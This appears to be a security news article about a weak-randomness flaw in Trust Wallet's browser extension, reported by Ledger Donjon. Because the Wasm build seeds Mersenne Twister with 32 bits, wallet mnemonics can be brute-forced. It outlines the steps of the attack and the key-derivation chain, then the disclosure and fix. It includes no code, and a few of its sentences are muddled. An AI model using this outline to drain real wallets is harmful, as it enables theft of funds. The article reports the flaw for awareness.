Trust Wallet made a significant announcement on November 14th, 2022, unveiling its newly launched browser extension for wide usage.
The browser extension grants direct access to digital assets on multiple blockchains, a highly anticipated complement to the existing iOS and Android apps in Trust Wallet’s ecosystem.
However, recently, security analysts at Ledger Donjon found a major vulnerability in this browser extension. The newly discovered flaw enables asset theft from any wallet created with it, and for this, no user interaction is needed.
Vulnerability Overview
Moreover, Trust Wallet depends on the Trust Wallet Core; it’s a versatile library for blockchain wallets, which is now targeting Wasm since April 2022.
Trust Wallet Core is mostly portable, but some modules are target-specific, notably secure random generation for cryptographic material like:-
Private keys
HD wallet mnemonics
All implementations use OS-provided pseudorandom number generator (PRNG):-
For iOS, SecRandomCopyBytes is used.
For Android, the entropy is provided by an instance of java.security.SecureRandom.
The Wasm target lacks a common strong PRNG and system interfaces for browsers and Node.js environments.
The critical vulnerability arises due to using Mersenne Twister PRNG in wallet-core for Wasm, which is unfit for cryptography, and the single 32-bit seed input in mt19937.
The 32-bit seed in Wasm wallet-core allows just 2^32 (4 billion) mnemonics, generated quickly in a single computer within a couple of hours.
Here below we have mentioned all the abilities that it grants to the attackers:-
Compute all the seeds
Compute all the private keys
Compute all the addresses of every cryptocurrency
Scan the related blockchains
Extract all the used addresses
Compute the intersection
Acquire Trust Wallet for Wasm addresses, then exploit and drain their funds.
The closed-source extension easily analyzes code and relies on vulnerable Wasm in Trust Wallet Core to create the 12-word mnemonic from a 128-bit seed during wallet creation.
Assets Handled
The auto-generated Wasm wrapper HDWallet.create exploits the vulnerable random_buffer, risking mnemonic retrieval via brute force attack. While besides this, it handles various assets such as:-
AVAX
BNB
ETH
MATIC
SOL
TWT
PRNG seed to address transformation which necessitates the steps that we have mentioned below:-
Entropy generation
Entropy to mnemonic
Mnemonic to seed
Seed to BIP-32 master key
Master key to Ethereum private key
Ethereum private key to address
Here below we have mentioned all the standard derivation mechanisms that are used:-
BIP-32
BIP-39
BIP-44
The Trust Wallet extension address verification tool quickly tests 32 million addresses with a Python script; 1,873,720 dataset’s private key computation, which took 4 min 22s only.
Detection and Remediation
On November 17, 2022, the vulnerability was reported to Binance.
On November 21, the Trustwallet team publicly fixed it on GitHub.
Despite disclosure and patch, $100k remains at risk in wallets, with Trust Wallet promising repayment for stolen funds.
This vulnerability exemplifies the worst crypto bug – accounts compromised forever. Ledger devices ensure good randomness with certified smartcard chips for 40 years of tamper resistance.